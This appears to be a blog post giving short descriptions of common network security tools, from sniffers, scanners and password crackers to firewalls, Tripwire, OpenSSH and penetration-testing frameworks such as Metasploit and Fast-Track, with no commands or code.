Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

dsniff
dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap
Ettercap is a multipurpose sniffer/interceptor/logger for switched LANs. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire
Tripwire is a tool that can be used for data and program integrity assurance.

Kismet
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packet mangling.

IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf
OpenBSD Packet Filter

fport
fport identifies all open TCP/IP and UDP ports and maps them to the owning application.

SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Update:  
Metasploit
Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only.

Fast-track 
Fast-Track is a python based open source security tool aimed at helping penetration testers conduct highly advanced and time consuming attacks in a more methodical and automated way. Fast-Track is now included in Backtrack version 3 onwards under the Backtrack --> Penetration category. In this talk given at Shmoocon 2009, the author of Fast-Track Dave Kennedy runs us through a primer on the tool and demonstrates 7 different scenarios in which he breaks into systems using the Fast-Track tool. These scenarios include automated SQL injection, MSSQL brute forcing, Query string pwnage, Exploit rewrite, Destroying the Client and Autopwnage. 


If you know more, share with me via comment:)
